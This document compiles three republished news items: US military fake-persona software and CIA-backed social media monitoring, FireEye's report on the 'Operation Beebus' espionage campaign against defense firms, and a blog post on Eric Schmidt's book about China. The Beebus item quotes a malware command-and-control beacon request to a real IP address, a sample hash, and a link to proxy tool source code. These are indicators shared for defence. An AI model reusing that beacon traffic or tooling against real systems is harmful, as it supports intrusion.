US/1; ATTN: US/12; HST/2; TJ/2
Most people use social media like Facebook and Twitter to share
photos of friends and family, chat with friends and strangers about
random and amusing diversions, or follow their favorite websites, bands
and television shows.
But what does the US military use those same networks for? Well, we
can't tell you: That's "classified," a CENTCOM spokesman recently
informed Raw Story.
One use that's confirmed, however, is the manipulation of social
media through the use of fake online "personas" managed by the military.
Recently the US Air Force had solicited private sector vendors for
something called "persona management software." Such a technology would
allow single individuals to command virtual armies of fake, digital
"people" across numerous social media portals.
These "personas" were to have detailed, fictionalized backgrounds,
to make them believable to outside observers, and a sophisticated
identity protection service was to back them up, preventing suspicious
readers from uncovering the real person behind the account. They even
worked out ways to game geolocating services, so these "personas" could
be virtually inserted anywhere in the world, providing ostensibly live
commentary on real events, even while the operator was not really
present.
When Raw Story first reported on the contract for this software, it was
unclear what the Air Force wanted with it or even if it had been
acquired. The potential for misuse, however, was abundantly clear.
A fake virtual army of people could be used to help create the
impression of consensus opinion in online comment threads, or manipulate
social media to the point where valuable stories are suppressed.
Ultimately, this can have the effect of causing a net change to the public's opinions and understanding of key world events.
Wired.com published an article how US spies are making investments
in the Company In-Q-Tel in order to monitor your blogs and read your
tweets.
In-Q-Tel, the investment arm of the CIA and the wider intelligence
community, is putting cash into Visible Technologies, a software firm
that specializes in monitoring social media. It's part of a larger
movement within the spy services to get better at using "open source
intelligence" - information that's publicly available, but often hidden
in the flood of TV shows, newspaper articles, blog posts, online videos
and radio reports generated every day.
Visible crawls over half a million web 2.0 sites a day, scraping
more than a million posts and conversations taking place on blogs,
online forums, Flickr, YouTube, Twitter and Amazon. (It doesn't touch
closed social networks, like Facebook, at the moment.) Customers get
customized, real-time feeds of what's being said on these sites, based
on a series of keywords.
"That's kind of the basic step - get in and monitor," says company senior vice president Blake Cahill.
Then Visible "scores" each post, labeling it as positive or
negative, mixed or neutral. It examines how influential a conversation
or an author is. ("Trying to determine who really matters," as Cahill
puts it.) Finally, Visible gives users a chance to tag posts, forward
them to colleagues and allow them to response through a web interface.
In-Q-Tel says it wants Visible to keep track of foreign social
media, and give spooks "early-warning detection on how issues are
playing internationally," spokesperson Donald Tighe tells Danger Room.
Of course, such a tool can also be pointed inward, at domestic
bloggers or tweeters. Visible already keeps tabs on web 2.0 sites for
Dell, AT&T and Verizon. For Microsoft, the company is monitoring the
buzz on its Windows 7 rollout. For Spam-maker Hormel, Visible is
tracking animal-right activists' online campaigns against the company.
"Anything that is out in the open is fair game for collection," says
Steven Aftergood, who tracks intelligence issues at the Federation of
American Scientists. But "even if information is openly gathered by
intelligence agencies it would still be problematic if it were used for
unauthorized domestic investigations or operations. Intelligence
agencies or employees might be tempted to use the tools at their
disposal to compile information on political figures, critics,
journalists or others, and to exploit such information for political
advantage. That is not permissible even if all of the information in
question is technically 'open source.'"
Visible chief executive officer Dan Vetras says the CIA is now an
"end customer," thanks to the In-Q-Tel investment. And more government
clients are now on the horizon. "We just got awarded another one in the
last few days," Vetras adds.
Tighe disputes this - sort of. "This contract, this deal, this
investment has nothing to do with any agency of government and this
company," he says. But Tighe quickly notes that In-Q-Tel does have "an
interested end customer" in the intelligence community for Visibile.
And if all goes well, the company's software will be used in pilot
programs at that agency. "In pilots, we use real data. And during the
adoption phase, we use it real missions."
Neither party would disclose the size of In-Q-Tel's investment in
Visible, a 90-person company with expected revenues of about $20 million
in 2010. But a source familiar with the deal says the In-Q-Tel cash
will be used to boost Visible's foreign languages capabilities, which
already include Arabic, French, Spanish and nine other languages.
Visible has been trying for nearly a year to break into the
government field. In late 2008, the company teamed up with the
Washington, DC, consulting firm Concepts & Strategies, which has
handled media monitoring and translation services for U.S. Strategic
Command and the Joint Chiefs of Staff, among others. On its website,
Concepts & Strategies is recruiting "social media engagement
specialists" with Defense Department experience and a high proficiency
in Arabic, Farsi, French, Urdu or Russian. The company is also looking
for an "information system security engineer" who already has a "Top
Secret SCI [Sensitive Compartmentalized Information] with NSA Full Scope
Polygraph" security clearance.
The intelligence community has been interested in social media for
years. In-Q-Tel has sunk money into companies like Attensity, which
recently announced its own web 2.0-monitoring service. The agencies have
their own, password-protected blogs and wikis - even a MySpace for
spooks. The Office of the Director of National Intelligence maintains an
Open Source Center, which combs publicly available information,
including web 2.0 sites. Doug Naquin, the Center's Director, told an
audience of intelligence professionals in October 2007 that "we're
looking now at YouTube, which carries some unique and honest-to-goodness
intelligence.... We have groups looking at what they call 'citizens
media': people taking pictures with their cell phones and posting them
on the internet. Then there's social media, phenomena like MySpace and
blogs."
But, "the CIA specifically needs the help of innovative tech firms
to keep up with the pace of innovation in social media. Experienced IC
[intelligence community] analysts may not be the best at detecting the
incessant shift in popularity of social-networking sites. They need help
in following young international internet user-herds as they move their
allegiance from one site to another," Lewis Shepherd, the former senior
technology officer at the Defense Intelligence Agency, says in an
e-mail. "Facebook says that more than 70 percent of its users are
outside the U.S., in more than 180 countries. There are more than 200
non-U.S., non-English-language microblogging Twitter-clone sites today.
If the intelligence community ignored that tsunami of real-time
information, we'd call them incompetent."
CONTINUE READING This and MORE HERE...
- OPEN SOURCE
US/1; ATTN: US/12; HST/2; TJ/2
Security Firm FireEye revealed
to have discovered an APT campaign targeting companies in the defense
and aerospace sector and that has been originated from China to steal
intellectual property and industrial secrets from US companies.
In this period many other attacks have been linked to China such as the cyber espionage campaign against NYT
and Washington Post, this time the hackers demonstrated particular
interest in the design of Unmanned Aerial Vehicles (UAVs) and other
robotic aircraft.
FireEye named the last campaign ‘Operation Beebus’ from the name of
an initial sample in this campaign (MD5:
7ed557921ac60dfcb295ebabfd972301), which was originally submitted to
VirusTotal on April 12, 2011
The schema adopted for the attack is a basic spear phishing,
the hackers in fact uses both email and drive-by downloads to targeted
victims exploiting common vulnerabilities in PDF and DOC files to
install a Trojan backdoor.
Last March FireEye registered suspicious activities against its
clients operating in aerospace and defense sector, continuous waves of
attacks that are repeated over time.
The principal evidence against China for the attack is related to
many similarities with past attacks linked to Beijing, the reuse of the
command and control infrastructure (C&C) connected to APT attack on RSA’s SecurID token system occurred in 2011. The researchers discovered the following “Beebus” traffic pattern:
GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Accept: */*
Host: 68.96.31.136
where the IP address 68.96.31.136 was another C2 node reported by
Dell SecureWorks as hosting the HTran proxy infrastructure. Dell’s
security team reported that the authors of the malware were Chinese and
it dated malware creation back to 2003, Dell Securwork post on the agent states:
“HTran (aka HUC Packet Transmit Tool) is a rudimentary
connection bouncer, designed to redirect TCP traffic destined for one
host to an alternate host. The source code copyright notice indicates
that HTran was authored by “lion”, a well-known Chinese hacker and
member of “HUC”, the Honker Union of China. The purpose of this type of
tool is to disguise either the true source or destination of Internet
traffic in the course of hacking activity.
Source code can be readily found on the Internet:
http://read.pudn.com/downloads199/sourcecode/windows/935255/htran.cpp__.htm
FireEye recorded 261 separate attacks on its clients in 2012, 123 of which were on UAV or UAS (Unmanned Aerial Systems) vendors.
In total the C&C had reached 214 servers with 60 unique IP addresses, a large investment in time and effort.
The attackers identified by FireEye used the same techniques and
tools of the RSA attack, according to McAfee, one of the major tools
used by these hackers was the use of obfuscated or encrypted HTML
comments embedded in otherwise benign websites, in order to indirectly
control compromised endpoints.
“Obfuscated/encrypted HTML comments has been also
widely reported in the media as associated with the nation state group
called “Comment Group” or “Comment Team,” which is believed to be
associated with the Chinese government.“
Darien Kindlund, senior staff scientist at FireEye declared:
“We have enough evidence that points heavily in that
direction” “We knew this was being done on behalf of a nation state,”
“we believe the attack was largely successful.”
It ‘clear that to deal with the phenomenon of cyber espionage
requires a structured approach, the threat has grown in complexity in
recent years and in many cases the attackers were able to evade the main
security mechanisms for long periods.
On the one hand therefore be thought of a new model of dynamic
defense which however cannot be separated by a major level of awareness
of users, in majority of cases the exposure is caused by wrong human behavior.
You must know the threat to mitigate it.
Pierluigi Paganini
- OPEN SOURCE
US/1; ATTN:
By Tom Gara
Google GOOG +2.63% executive chairman Eric Schmidt is brutally clear: China is the most dangerous superpower on Earth.
Corporate Intelligence reviewed preliminary galleys of
Schmidt’s new book, “The New Digital Age,” (Random House) which debuts
in April. And Schmidt’s views on China stand out the strongest amid
often predictable techno-utopian views of the future.
Some of these views are both cliched and camera-ready . He imagines
that soon an “illiterate Maasai cattle herder in the Serengeti” will use
a smartphone to “inquire the day’s market prices and crowd-source the
whereabouts of any nearby predators.”
Other parts of the book are a much darker take on how authoritarians,
extremists and rogues of all varieties are becoming just as empowered
as that Maasai herdsman. And the good guys, whoever they are, have yet
to work out how to properly defend themselves.
The new book is co-written by Jared Cohen, a 31-year old former State
Department big shot who now runs Google Ideas, the search giant’s think
tank.
The Schmidt and Cohen partnership has at least one other impressive credit to its name. The two wrote a long essay,“The Digital Disruption,”
published in November 2010. In its opening paragraph, it predicted that
“governments will be caught off-guard when large numbers of their
citizens, armed with virtually nothing but cell phones, take part in
mini-rebellions that challenge their authority.”
A month later, a wave of popular uprisings began across the Arab
world. As the Egyptian revolution kicked off in January 2011, Cohen, so
the story goes, was not only in Cairo: he shared dinner with Google
executive and high-profile activist Wael Ghonim just hours before he was snatched from the streets by security forces.
With the Arab uprisings rolling onward, “The New Digital Age” picks
up where that previous essay left off, taking a big-picture view on how
everything from individual identities to corporate strategy, terrorism
and statecraft will change as information seeps ever deeper. And in this
all-Internet world, China, the book says again and again, is a
dangerous and menacing superpower.
China, Schmidt and Cohen write, is “the world’s most active and
enthusiastic filterer of information” as well as “the most sophisticated
and prolific” hacker of foreign companies. In a world that is becoming
increasingly digital, the willingness of China’s government and state
companies to use cyber crime gives the country an economic and political
edge, they say.
“The disparity between American and Chinese firms and their tactics
will put both the government and the companies of the United States as a
distinct disadvantage,” because “the United States will not take the
same path of digital corporate espionage, as its laws are much stricter
(and better enforced) and because illicit competition violates the
American sense of fair play,” they claim.
“This is a difference in values as much as a legal one.”
The U.S. is far from an angel, the book acknowledges. From
high-profile cases of cyber-espionage such as the Stuxnet virus that
targeted Iranian nuclear facilities, to exports of surveillance software
and technology to states with bad human rights records, there is plenty
at home to criticize.
And those criticisms will become louder and more politically
resonant, Schmidt and Cohen claim, as the distinctions between states
that support freedom online and those that suppress it become clearer.
The pair even speculate that the Internet could eventually fracture into
pieces, some controlled by an alliance of states that are relatively
tolerant and free, and others by groupings that want their citizens to
take part in a less rowdy and open online life. Companies doing business
with the latter could find themselves shunned from the former, the book
suggests.
In this roundabout way the pair come close, on occasion, to
suggesting western governments follow China’s lead and form closer
relationships between state policy and corporate activity.
Take the equipment and software that comprises the Internet. Most of
the world’s IT systems were once based almost entirely on Western
infrastructure, but as Chinese firms get more competitive, that is
changing, and not necessarily for the better, they say:
In the future superpower supplier nations will look to
create their spheres of online influence around specific protocols and
products, so that their technologies form the backbone of a particular
society and their client states come to rely on certain critical
infrastructure that the superpower alone builds, services and controls.
Chinese telecom equipment companies, rapidly gaining market share
around the world, are at the front lines of the expansion this sphere of
influence, they say: “Where Huawei gains market share, the influence
and reach of China grow as well”. And while western vendors like Cisco Systems CSCO +1.26% and Ericsson are not state controlled, the will likely become closer to their governments in the future, Schmidt and Cohen say:
There will come a time when their commercial and national
interests align and contrast with China — say, over the abuse of their
products by an authoritarian state — and they will coordinate their
efforts with their governments on both diplomatic and technical levels.
But for all the advantages China gains from its approach to the
Internet, Schmidt and Cohen still seem to think its hollow political
center is unsustainable. “This mix of active citizens armed with
technological devices and tight government control is exceptionally
volatile,” they write, warning this could lead to “widespread
instability.”
In the longer run, China will see “some kind of revolution in the coming decades,” they write.
Update: Looking for more Schmidt? See our next post - The Future According To Eric: 7 Points
Check out the rest of the WSJ’s Corporate Intelligence blog here, or follow @wsjcorpintel, or our editor, @tomgara
CONTINUE READING This Story and MORE HERE...
